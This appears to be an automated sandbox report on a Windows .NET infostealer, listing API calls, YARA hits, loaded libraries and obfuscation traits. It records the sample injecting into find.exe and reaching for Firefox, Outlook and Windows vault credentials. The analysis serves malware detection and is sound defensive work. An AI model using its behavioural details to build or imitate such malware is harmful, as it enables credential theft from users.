                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3864375083.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3857227824.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1567443784.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1572202797.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042C8C3 NtClose,3_2_0042C8C3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82B60 NtClose,LdrInitializeThunk,3_2_00F82B60
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00F82C70
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_00F82DF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F835C0 NtCreateMutant,LdrInitializeThunk,3_2_00F835C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F84340 NtSetContextThread,3_2_00F84340
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F84650 NtSuspendThread,3_2_00F84650
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82AF0 NtWriteFile,3_2_00F82AF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82AD0 NtReadFile,3_2_00F82AD0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82AB0 NtWaitForSingleObject,3_2_00F82AB0
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82BF0 NtAllocateVirtualMemory
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82BE0 NtQueryValueKey
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82BA0 NtEnumerateValueKey
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82B80 NtQueryInformationFile
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82CF0 NtOpenProcess
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82CC0 NtQueryVirtualMemory
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82CA0 NtQueryInformationToken
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82C60 NtCreateKey
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82C00 NtQueryInformationProcess
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82DD0 NtDelayExecution
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82DB0 NtEnumerateKey
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82D30 NtUnmapViewOfSection
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82D10 NtMapViewOfSection
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82D00 NtSetInformationFile
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82EE0 NtQueueApcThread
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82EA0 NtAdjustPrivilegesToken
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82E80 NtReadVirtualMemory
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82E30 NtWriteVirtualMemory
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82FE0 NtCreateFile
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82FB0 NtResumeThread
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82FA0 NtQuerySection
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82F90 NtProtectVirtualMemory
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82F60 NtCreateProcessEx
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F82F30 NtCreateSection
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F83090 NtSetValueKey
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F83010 NtOpenDirectoryObject
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F839B0 NtGetContextThread
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F83D70 NtOpenThread
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F83D10 NtOpenProcessToken
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F54340 NtSetContextThread, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F54650 NtSuspendThread, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52AF0 NtWriteFile, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52AD0 NtReadFile, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52BF0 NtAllocateVirtualMemory, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52BE0 NtQueryValueKey, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52BA0 NtEnumerateValueKey, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52B60 NtClose, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52EE0 NtQueueApcThread, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52E80 NtReadVirtualMemory, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52FE0 NtCreateFile, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52FB0 NtResumeThread, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52F30 NtCreateSection, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52CA0 NtQueryInformationToken, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52C70 NtFreeVirtualMemory, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52C60 NtCreateKey, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52DF0 NtQuerySystemInformation, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52DD0 NtDelayExecution, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52D30 NtUnmapViewOfSection, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52D10 NtMapViewOfSection, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F535C0 NtCreateMutant, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F539B0 NtGetContextThread, LdrInitializeThunk
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52AB0 NtWaitForSingleObject
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52B80 NtQueryInformationFile
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52EA0 NtAdjustPrivilegesToken
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52E30 NtWriteVirtualMemory
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52FA0 NtQuerySection
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52F90 NtProtectVirtualMemory
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52F60 NtCreateProcessEx
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52CF0 NtOpenProcess
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52CC0 NtQueryVirtualMemory
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52C00 NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52DB0 NtEnumerateKey
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F52D00 NtSetInformationFile
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F53090 NtSetValueKey
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F53010 NtOpenDirectoryObject
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F53D70 NtOpenThread
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_02F53D10 NtOpenProcessToken
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_006E9370 NtCreateFile
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_006E94D0 NtReadFile
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_006E95C0 NtDeleteFile
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_006E9660 NtClose
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_006E97B0 NtAllocateVirtualMemory
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_00DCF996 NtClose
                      Source: C:\Windows\SysWOW64\find.exeCode function: String function: 02F55130 appears 58 times
                      Source: C:\Windows\SysWOW64\find.exeCode function: String function: 02F0B970 appears 280 times
                      Source: C:\Windows\SysWOW64\find.exeCode function: String function: 02F8EA12 appears 86 times
                      Source: C:\Windows\SysWOW64\find.exeCode function: String function: 02F67E54 appears 111 times
                      Source: C:\Windows\SysWOW64\find.exeCode function: String function: 02F9F290 appears 105 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00F97E54 appears 111 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FCF290 appears 105 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00F85130 appears 58 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00F3B970 appears 280 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FBEA12 appears 86 times
Source: file.exe | Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.1420015259.0000000007200000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs file.exe
Source: file.exe, 00000000.00000002.1420720105.0000000007510000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
Source: file.exe, 00000000.00000002.1417267830.0000000003E39000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs file.exe
Source: file.exe, 00000000.00000002.1417267830.0000000003E39000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
Source: file.exe, 00000000.00000002.1415159712.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000000.1392565502.0000000000B0E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameVqTu.exe" vs file.exe
Source: file.exe, 00000003.00000002.1567304245.0000000000C58000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFIND.EXEj% vs file.exe
Source: file.exe, 00000003.00000002.1567304245.0000000000C68000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFIND.EXEj% vs file.exe
Source: file.exe, 00000003.00000002.1567650685.000000000103D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs file.exe
Source: file.exe | Binary or memory string: OriginalFilenameVqTu.exe" vs file.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, GV3ENqm9nOtfltcevd.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, vcGrCi4KDgYFK31I25.cs | Security API names: _0020.SetAccessControl
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, vcGrCi4KDgYFK31I25.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, vcGrCi4KDgYFK31I25.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.file.exe.7510000.5.raw.unpack, vcGrCi4KDgYFK31I25.cs | Security API names: _0020.SetAccessControl
Source: 0.2.file.exe.7510000.5.raw.unpack, vcGrCi4KDgYFK31I25.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.7510000.5.raw.unpack, vcGrCi4KDgYFK31I25.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.file.exe.7510000.5.raw.unpack, GV3ENqm9nOtfltcevd.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@17/11
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
Source: C:\Users\user\Desktop\file.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\find.exe | File created: C:\Users\user\AppData\Local\Temp\e151968
Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: find.exe, 00000005.00000002.3858129273.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000002.3858129273.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000003.1769436271.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000003.1769517656.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000003.1771465886.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000003.1771465886.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000002.3858129273.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe | ReversingLabs: Detection: 34%
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"
Source: C:\Windows\SysWOW64\find.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\file.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iconcodecservice.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\find.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\find.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: find.pdb source: file.exe, 00000003.00000002.1567304245.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, YpbicUfTwt.exe, 00000004.00000002.3861151206.0000000001188000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YpbicUfTwt.exe, 00000004.00000002.3854637326.000000000029E000.00000002.00000001.01000000.0000000C.sdmp, YpbicUfTwt.exe, 00000007.00000000.1639437568.000000000029E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: file.exe, 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000005.00000003.1566753130.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000003.1573647222.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, find.exe, find.exe, 00000005.00000003.1566753130.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000003.1573647222.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: find.pdbGCTL source: file.exe, 00000003.00000002.1567304245.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, YpbicUfTwt.exe, 00000004.00000002.3861151206.0000000001188000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: 0.2.file.exe.7200000.4.raw.unpack, id.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, vcGrCi4KDgYFK31I25.cs | .Net Code: y01DCYMc7p System.Reflection.Assembly.Load(byte[])
Source: 0.2.file.exe.7510000.5.raw.unpack, vcGrCi4KDgYFK31I25.cs | .Net Code: y01DCYMc7p System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00416043 push ecx; iretd | 3_2_00416091
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00403260 push eax; ret | 3_2_00403262
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00417A0F push edi; iretd | 3_2_00417A1C
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00417A13 push edi; iretd | 3_2_00417A1C
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00413C75 push esp; iretd | 3_2_00413D3E
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00414C2E push cs; iretd | 3_2_00414C2F
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00413C83 push esp; iretd | 3_2_00413D3E
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_004185A1 push eax; retf | 3_2_004185A2
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00417EF3 push edi; ret | 3_2_00417EFF
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F409AD push ecx; mov dword ptr [esp], ecx | 3_2_00F409B6
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F11344 push eax; iretd | 3_2_00F11369
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | Code function: 4_2_02F502B3 push cs; iretd | 4_2_02F502B4
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | Code function: 4_2_02F53094 push edi; iretd | 4_2_02F530A1
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | Code function: 4_2_02F53098 push edi; iretd | 4_2_02F530A1
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | Code function: 4_2_02F50FFE push 7F79A0F1h; ret | 4_2_02F5100D
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | Code function: 4_2_02F53C26 push eax; retf | 4_2_02F53C27
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | Code function: 4_2_02F53578 push edi; ret | 4_2_02F53584
Source: C:\Windows\SysWOW64\find.exe | Code function: 5_2_02EE225F pushad ; ret | 5_2_02EE27F9
Source: C:\Windows\SysWOW64\find.exe | Code function: 5_2_02EE27FA pushad ; ret | 5_2_02EE27F9
Source: C:\Windows\SysWOW64\find.exe | Code function: 5_2_02EE283D push eax; iretd | 5_2_02EE2858
Source: C:\Windows\SysWOW64\find.exe | Code function: 5_2_02F109AD push ecx; mov dword ptr [esp], ecx | 5_2_02F109B6
Source: C:\Windows\SysWOW64\find.exe | Code function: 5_2_02EE1368 push eax; iretd | 5_2_02EE1369
Source: C:\Windows\SysWOW64\find.exe | Code function: 5_2_006DC4FF push edi; ret | 5_2_006DC52D
Source: C:\Windows\SysWOW64\find.exe | Code function: 5_2_006D2716 push 7F79A0F1h; ret | 5_2_006D2725
Source: C:\Windows\SysWOW64\find.exe | Code function: 5_2_006D47AC push edi; iretd | 5_2_006D47B9
Source: C:\Windows\SysWOW64\find.exe | Code function: 5_2_006D47B0 push edi; iretd | 5_2_006D47B9
Source: C:\Windows\SysWOW64\find.exe | Code function: 5_2_006D0A20 push esp; iretd | 5_2_006D0ADB
Source: C:\Windows\SysWOW64\find.exe | Code function: 5_2_006D0A12 push esp; iretd | 5_2_006D0ADB
Source: C:\Windows\SysWOW64\find.exe | Code function: 5_2_006D4C90 push edi; ret | 5_2_006D4C9C
Source: C:\Windows\SysWOW64\find.exe | Code function: 5_2_006D2DE0 push ecx; iretd | 5_2_006D2E2E
Source: C:\Windows\SysWOW64\find.exe | Code function: 5_2_006D533E push eax; retf | 5_2_006D533F
Source: file.exe | Static PE information: section name: .text entropy: 7.764392398976114
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, eINg4dDTquMH7LHiXG.cs | High entropy of concatenated method names: 'IkpAtV3ENq', 'BnOA4tfltc', 'UrjAoAjsrM', 'AFRAgEQ4oI', 'kSFAONmlrW', 'TghAFqgVE1', 'CDSWMnkD6MFTm0g7nv', 'gsW7sopAYdQYvmYeLk', 'oocAAllTXa', 'LLOAqfjmjm'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, IqQJjOU3Dce860oeqQ.cs | High entropy of concatenated method names: 'ChfCKvpbt', 'dpV0qLUSp', 'ItLWGMKLC', 'COtfkENPm', 'hqEJvfhII', 'fWI1bxqit', 'bwSlcWG1DyFQT4bObe', 'T6OuXCcCLYxlMJ4y2L', 'BJZMvDqOeUSjPuSEGn', 'aSAXrB08G'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, f24LqMJrjAjsrM0FRE.cs | High entropy of concatenated method names: 'RGMG0UlXZ6', 'X7sGWG9UsG', 'qwEGm2dnC6', 'QedGJFLQcA', 's9qGOdEoej', 'C7NGF7QMgJ', 'AcXGu0l8L1', 'WxpGXuEk3v', 'aXYGl6CdVJ', 'C72Gy8Hbud'
